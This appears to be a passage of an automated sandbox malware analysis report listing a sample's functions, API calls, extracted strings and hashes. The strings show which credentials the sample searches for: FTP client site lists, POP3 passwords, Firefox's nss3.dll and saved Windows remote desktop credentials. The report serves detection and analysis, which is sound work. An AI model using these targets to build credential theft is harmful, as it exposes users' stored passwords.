                  • Opcode ID: 95366604600c8e15dfa013a5a2604b337b223ea72c69a09753fbf574a1143f3c
                  • Instruction ID: 7cc38a76399661454f9fed8d13c29c2c9e33c78ddd19b9e5c2cb9053d3d96bf7
                  • Opcode Fuzzy Hash: 95366604600c8e15dfa013a5a2604b337b223ea72c69a09753fbf574a1143f3c
                  • Instruction Fuzzy Hash: 15313D3290401ABEDF12AFA2CC02DEE7E76AF44344F10483BF501B51B1D7794A61EB99
                  Function 0040816D Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(00D36918,FTPCON), ref: 0040819B
                  • StrStrIA.SHLWAPI(00D33330,FTP CONTROL,00000000,00D36918,FTPCON), ref: 004081A7
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                  • API String ID: 0-2908215140
                  • Opcode ID: 6c4d59e4a0a35497f8836009f8fe87b60cefb34a10a5be8cc295110e275bf344
                  • Instruction ID: fc0db2b52977a28aa23f0be5b734c0375cfb0fc6bea7469442c9d19bb68c55c0
                  • Opcode Fuzzy Hash: 6c4d59e4a0a35497f8836009f8fe87b60cefb34a10a5be8cc295110e275bf344
                  • Instruction Fuzzy Hash: A201D670600205BADB117A258D01FDF7E19DF81314F34413BB985751D2EE7C5A8282EC
                  Function 0040242B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  • lstrlen.KERNEL32(?), ref: 0040243F
                  • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                  • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                  • lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID: .exe
                  • API String ID: 2414487701-4119554291
                  • Opcode ID: fa324bc166251441f3c767436827a14cf7c088f0ab5bc713754fc440ea09f082
                  • Instruction ID: e588ee8f1b3627a42a1d0e2e0e88280e9b13f327ccc7d4343294799c22d31f0d
                  • Opcode Fuzzy Hash: fa324bc166251441f3c767436827a14cf7c088f0ab5bc713754fc440ea09f082
                  • Instruction Fuzzy Hash: FDF0C83120429269DB3132268C09F6F6F859B92744F140037F540B72D3D7FC989297BE
                  Function 0040E63A Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 135COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: <POP3_Password2
                  • API String ID: 0-2923094552
                  • Opcode ID: c9db80333b9d8693281438b5e816e98cfae9730b84fee1fced08ef21377605c4
                  • Instruction ID: 117429db392a8dff71ae317fff0a5dd8b416180247b928e825f6f7dcda499f68
                  • Opcode Fuzzy Hash: c9db80333b9d8693281438b5e816e98cfae9730b84fee1fced08ef21377605c4
                  • Instruction Fuzzy Hash: F3416031D00019AEDF126BA2DC01CEEBE76EF58354B144837F501B61A1D77A4A61EBA9
                  Function 0040CD6B Relevance: 7.6, APIs: 5, Instructions: 79stringCOMMON
                  Download Yara Rule
                  APIs
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD9B
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CDC1
                  • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDE5
                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE07
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDF2
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                  • String ID:
                  • API String ID: 1890766102-0
                  • Opcode ID: 417bf511cc47e1740702e06a000a3ccebe7292047eef02df589188c2c827b1fa
                  • Instruction ID: 41b9c1d827694c45b055be9885e390ab78c4181ca929fd9b4fad9bc2efccc836
                  • Opcode Fuzzy Hash: 417bf511cc47e1740702e06a000a3ccebe7292047eef02df589188c2c827b1fa
                  • Instruction Fuzzy Hash: 2E214271D44208FEEF116BA1CC46F9E7F76EF04314F20456AB110B91E1D7B95A90DB68
                  Function 00405BC0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(00D33330,FTP Navigator), ref: 00405BEE
                  • StrStrIA.SHLWAPI(00D33330,FTP Commander,00D33330,FTP Navigator), ref: 00405C1C
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: FTP Commander$FTP Navigator$ftplist.txt
                  • API String ID: 1884169789-2424314702
                  • Opcode ID: 78eea96c85ce5b10c3fbc50c725c790910efced89a8a216ce089480967cc70c8
                  • Instruction ID: 0320ffd316df927a0efd926faa4204048ffcf42f712ae02ca79a5731921818e2
                  • Opcode Fuzzy Hash: 78eea96c85ce5b10c3fbc50c725c790910efced89a8a216ce089480967cc70c8
                  • Instruction Fuzzy Hash: 5D01C870504510B9EB1276228C02FEF7E5ADB81354F24453BB840751E6D77C5BC29AAC
                  Function 0040CFF0 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(00D36918,FTPNow), ref: 0040D017
                  • StrStrIA.SHLWAPI(00D36918,FTP Now,00D36918,FTPNow), ref: 0040D028
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: FTP Now$FTPNow$sites.xml
                  • API String ID: 0-284577462
                  • Opcode ID: 3eca2f1ee8255ce881a856c935d0a5ff55966a413693686c6d0254ccb6705832
                  • Instruction ID: 9ac50745644adb25db173f01573f115ed7c2f664e3b6313370bf1ebd0551913d
                  • Opcode Fuzzy Hash: 3eca2f1ee8255ce881a856c935d0a5ff55966a413693686c6d0254ccb6705832
                  • Instruction Fuzzy Hash: 38F08670900101B5DB213A758C42FAF7A559B8175CF14013BB918B11E6D6BDCAC6926D
                  Function 00401DF8 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 29stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00401E19
                  • lstrlen.KERNEL32(00000000,?), ref: 00401E23
                  • lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID: AHA
                  • API String ID: 2414487701-3076688622
                  • Opcode ID: 8b71fd94be391c9da2ad78ec7c6fd034545c5821bd2ecc25d06e0cfb578feca0
                  • Instruction ID: e8b6ae58985bcf3d9347890230853402862c47fd0fba66da3f713a940b2c391b
                  • Opcode Fuzzy Hash: 8b71fd94be391c9da2ad78ec7c6fd034545c5821bd2ecc25d06e0cfb578feca0
                  • Instruction Fuzzy Hash: D9F01C75200208BFDF017F62CC85A9D3B9AAB5035CF00D52AB90519152E7BD89E48B58
                  Function 0040C587 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5A7
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5C9
                  • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C5DD
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$OpenStorage
                  • String ID: Settings
                  • API String ID: 2489594185-473154195
                  • Opcode ID: ef96ca91c8f27b0f0742eb89e84b0124d34e54d5bf3fdb2680921541f42774b0
                  • Instruction ID: b220449be4f11014668baed62f477efadcf711df6315186e1d65e6fb7baf8efc
                  • Opcode Fuzzy Hash: ef96ca91c8f27b0f0742eb89e84b0124d34e54d5bf3fdb2680921541f42774b0
                  • Instruction Fuzzy Hash: E231CC31A4010AFBEF11AFA1CC42F9EBB76BF04704F208676B610791F1D7759A50AB58
                  Function 00401A27 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60stringCOMMON
                  Download Yara Rule
                  APIs
                  • GlobalFix.KERNEL32(?), ref: 00401A55
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • GlobalUnWire.KERNEL32(?), ref: 00401A7D
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A85
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: GlobalLocal$AllocFreeWirelstrlen
                  • String ID: CRYPTED0YUI1.0
                  • API String ID: 165658394-1217275205
                  • Opcode ID: de68d6e1315197927577642856d0d1e9ecb02aaa808b22b6a5956b7194fcc653
                  • Instruction ID: 5516b763cc08dca7c43a7b98d07d229009a7bc976859522b8417ba9aece18d00
                  • Opcode Fuzzy Hash: de68d6e1315197927577642856d0d1e9ecb02aaa808b22b6a5956b7194fcc653
                  • Instruction Fuzzy Hash: 1D118671D00109BEDF026FE1CC429DD7F7AEF44348F008076B915B51B2D77A8AA5AB58
                  Function 0040FB14 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                  • GlobalFix.KERNEL32(?), ref: 0040FB5A
                  • GlobalUnWire.KERNEL32(?), ref: 0040FB72
                  • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040FB29), ref: 0040FB8D
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$Wire
                  • String ID: STATUS-IMPORT-OK
                  • API String ID: 427882606-1591331578
                  • Opcode ID: 3bd0028bd82ac8d0a8d851e1d04e875ce27c06409241a217d3b9dc50780aeffa
                  • Instruction ID: be40241b7161955c20726612fc7c341daec3493e026f11a1c8ecc6ebd3bd8b9d
                  • Opcode Fuzzy Hash: 3bd0028bd82ac8d0a8d851e1d04e875ce27c06409241a217d3b9dc50780aeffa
                  • Instruction Fuzzy Hash: D7012131D04208BADF127BB2CC429AD7B79EB01348F504177B550B11A2DBBE9E949B58
                  Function 00408568 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: http://$https://
                  • API String ID: 0-1916535328
                  • Opcode ID: 3d71c500a3d52b6c1441a28b08993b9dff3abac0df888200a45433a7d3fca379
                  • Instruction ID: e74c1b2a948100d7a20d9e42ebddfc060ab39c2c859d7100c87d751417799821
                  • Opcode Fuzzy Hash: 3d71c500a3d52b6c1441a28b08993b9dff3abac0df888200a45433a7d3fca379
                  • Instruction Fuzzy Hash: 87411931800109FADF12AF91DE05BEE7BB6AF40358F10853AB551791F1CB7A4B90EB99
                  Function 0040CC29 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                  • StrStrIA.SHLWAPI(?,00416799), ref: 0040CC68
                  • lstrlen.KERNEL32(TERMSRV/,?,00416799), ref: 0040CC76
                  • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00416799), ref: 0040CC86
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen
                  • String ID: TERMSRV/
                  • API String ID: 1659193697-3001602198
                  • Opcode ID: 84e16c946d975c6994fc352a951dbbef6030e1c0c429251910d6422501b2576f
                  • Instruction ID: 68f82cc74d5732e4df8834f790b63f09b103c0f51cb433b5b3d7af799168e2e2
                  • Opcode Fuzzy Hash: 84e16c946d975c6994fc352a951dbbef6030e1c0c429251910d6422501b2576f
                  • Instruction Fuzzy Hash: 3B11E831410109FFCF026F61CC428DD3EB2AF44398F10452AB929791F1D77A8AB1AB88
                  Function 004017D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                  Download Yara Rule
                  APIs
                  • GlobalFix.KERNEL32(?), ref: 00401800
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • GlobalUnWire.KERNEL32(?), ref: 0040185E
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040186D
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: GlobalLocal$AllocFreeWire
                  • String ID: PKDFILE0YUICRYPTED0YUI1.0
                  • API String ID: 3297799765-258907703
                  • Opcode ID: 6330d0fdcfb704d36495aecea66acedf5a78f0c7817a92b223f54b90618a218a
                  • Instruction ID: 242ffcd3590a634520bc911c351e46a2d3a0c6a5358af9120b3fa39d358ca222
                  • Opcode Fuzzy Hash: 6330d0fdcfb704d36495aecea66acedf5a78f0c7817a92b223f54b90618a218a
                  • Instruction Fuzzy Hash: A921EC72D00109BBEF017FE1DC42AAD7E76EF10344F10807ABA10751B1E77A8A609B98
                  Function 00409061 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00409074
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409095
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectorylstrlen
                  • String ID: nss3.dll
                  • API String ID: 2713697268-2492180550
                  • Opcode ID: 9303ff7b80a937c2c754f6be0409136252a2ab3fc9a458800c4bab097c034e15
                  • Instruction ID: fafa4c9f2cd23987641e552e7df34fc844c72cf86d1cbb3ef9db78e87a86cd5c
                  • Opcode Fuzzy Hash: 9303ff7b80a937c2c754f6be0409136252a2ab3fc9a458800c4bab097c034e15
                  • Instruction Fuzzy Hash: 18118E70A40101EBDB106F25EC4E7C93FA1FB88304F00843AF015A42E6D7F98DA68A0D
                  Function 0040CCDA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                  Download Yara Rule
                  APIs
                  • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD19
                  • CredFree.ADVAPI32(00000000), ref: 0040CD60
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Cred$EnumerateFree
                  • String ID: TERMSRV/*
                  • API String ID: 3403564193-275249402
                  • Opcode ID: 07f63fe400d4a5bc404cf42aa4128ec2a5b8c441f98532edb148a727f2375307
                  • Instruction ID: 4f6d88ad46612d9a6f3f2a6ecf9550f7317fb44355aabb19cf27236a77551134
                  • Opcode Fuzzy Hash: 07f63fe400d4a5bc404cf42aa4128ec2a5b8c441f98532edb148a727f2375307
                  • Instruction Fuzzy Hash: 9B113531800208EBDF319F94C988BDABBB4EF05709F14827BA501721E0D379AE85DB8D